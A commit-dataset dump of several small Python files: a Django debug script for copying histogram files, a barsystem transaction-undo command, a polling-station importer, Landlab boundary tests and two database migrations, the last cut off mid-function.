genome_designer/debug/2015_03_02_get_histo_files.py
|
"""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
Debug script to aggregate lumpy histogram files.
|
Debug script to aggregate lumpy histogram files.
|
Python
|
mit
|
woodymit/millstone,churchlab/millstone,woodymit/millstone_accidental_source,woodymit/millstone,churchlab/millstone,woodymit/millstone,woodymit/millstone,churchlab/millstone,woodymit/millstone_accidental_source,woodymit/millstone_accidental_source,churchlab/millstone,woodymit/millstone_accidental_source
|
Debug script to aggregate lumpy histogram files.
|
"""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Debug script to aggregate lumpy histogram files.<commit_after>
|
"""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
Debug script to aggregate lumpy histogram files."""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Debug script to aggregate lumpy histogram files.<commit_after>"""
Script to get all histo files.
"""
import os
import shutil
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from main.model_utils import get_dataset_with_type
from main.models import *
OUTPUT_DIR = 'histo_files'
def main():
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
for sa in ExperimentSampleToAlignment.objects.all():
histo_dataset = get_dataset_with_type(sa,
Dataset.TYPE.LUMPY_INSERT_METRICS_HISTOGRAM)
histo_dataset_full_path = histo_dataset.get_absolute_location()
# Update Dataset name.
histo_dataset_name = (
os.path.split(os.path.split(histo_dataset_full_path)[0])[1] + '.txt')
# Copy.
new_full_path = os.path.join(OUTPUT_DIR, histo_dataset_name)
shutil.copyfile(histo_dataset_full_path, new_full_path)
if __name__ == '__main__':
main()
|
|
b8dd5d1caff7a47f28e1f24a5a20cdd13a795830
|
barsystem_base/management/commands/undo_transaction.py
|
barsystem_base/management/commands/undo_transaction.py
|
from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
except Journal.DoesNotExist:
print('Invalid transaction')
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
Add management command to undo transactions.
|
Add management command to undo transactions.
|
Python
|
mit
|
TkkrLab/barsystem,TkkrLab/barsystem,TkkrLab/barsystem
|
Add management command to undo transactions.
|
from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
except Journal.DoesNotExist:
print('Invalid transaction')
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
<commit_before><commit_msg>Add management command to undo transactions.<commit_after>
|
from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
except Journal.DoesNotExist:
print('Invalid transaction')
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
Add management command to undo transactions.from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
except Journal.DoesNotExist:
print('Invalid transaction')
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
<commit_before><commit_msg>Add management command to undo transactions.<commit_after>from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
except Journal.DoesNotExist:
print('Invalid transaction')
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
|
d468d6a24eb7573163911eee8094c5cc47d1a08f
|
polling_stations/apps/data_collection/management/commands/import_south_cambridge.py
|
polling_stations/apps/data_collection/management/commands/import_south_cambridge.py
|
"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
Add importer for South Cambridgeshire.
|
Add importer for South Cambridgeshire.
refs #82
|
Python
|
bsd-3-clause
|
chris48s/UK-Polling-Stations,andylolz/UK-Polling-Stations,andylolz/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,andylolz/UK-Polling-Stations
|
Add importer for South Cambridgeshire.
refs #82
|
"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
<commit_before><commit_msg>Add importer for South Cambridgeshire.
refs #82<commit_after>
|
"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
Add importer for South Cambridgeshire.
refs #82"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
<commit_before><commit_msg>Add importer for South Cambridgeshire.
refs #82<commit_after>"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
|
20d50e4b5a3500865d97f12f2c48c72f558d170d
|
landlab/grid/tests/test_raster_grid/test_BC_updates.py
|
landlab/grid/tests/test_raster_grid/test_BC_updates.py
|
import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
Add tests for BC changes
|
Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.
|
Python
|
mit
|
Carralex/landlab,RondaStrauch/landlab,ManuSchmi88/landlab,RondaStrauch/landlab,amandersillinois/landlab,ManuSchmi88/landlab,SiccarPoint/landlab,cmshobe/landlab,laijingtao/landlab,amandersillinois/landlab,RondaStrauch/landlab,Carralex/landlab,cmshobe/landlab,landlab/landlab,csherwood-usgs/landlab,landlab/landlab,Carralex/landlab,ManuSchmi88/landlab,laijingtao/landlab,SiccarPoint/landlab,landlab/landlab,csherwood-usgs/landlab,cmshobe/landlab
|
Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.
|
import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
<commit_before><commit_msg>Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.<commit_after>
|
import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
<commit_before><commit_msg>Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.<commit_after>import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
|
54368e90a67c73450bb10607f9566b88db1d97f4
|
migrations/versions/740_migrate_supplier_frameworks_to_.py
|
migrations/versions/740_migrate_supplier_frameworks_to_.py
|
"""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
Migrate framework agreements to `framework_agreements`
|
Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not.
|
Python
|
mit
|
alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api
|
Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not.
|
"""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
<commit_before><commit_msg>Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not.<commit_after>
|
"""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not."""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
<commit_before><commit_msg>Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not.<commit_after>"""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
|
068a066e0bc89fb1476db5d24ceeb6b6b57f78a0
|
mysite/engage/migrations/0002_auto_20141218_0750.py
|
mysite/engage/migrations/0002_auto_20141218_0750.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
Add example features and permissions
|
Add example features and permissions
|
Python
|
bsd-3-clause
|
Kvoti/ditto,Kvoti/ditto,Kvoti/ditto,Kvoti/ditto,Kvoti/ditto
|
Add example features and permissions
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
<commit_before><commit_msg>Add example features and permissions<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
Add example features and permissions# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
